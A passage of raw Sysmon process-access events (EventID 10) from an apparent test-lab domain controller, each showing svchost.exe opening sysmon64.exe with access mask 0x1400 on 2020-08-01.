07:53:24.361","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1514,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.361\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.361","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1515,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1516,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1517,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1518,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1519,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1520,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.362","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1521,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.362\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 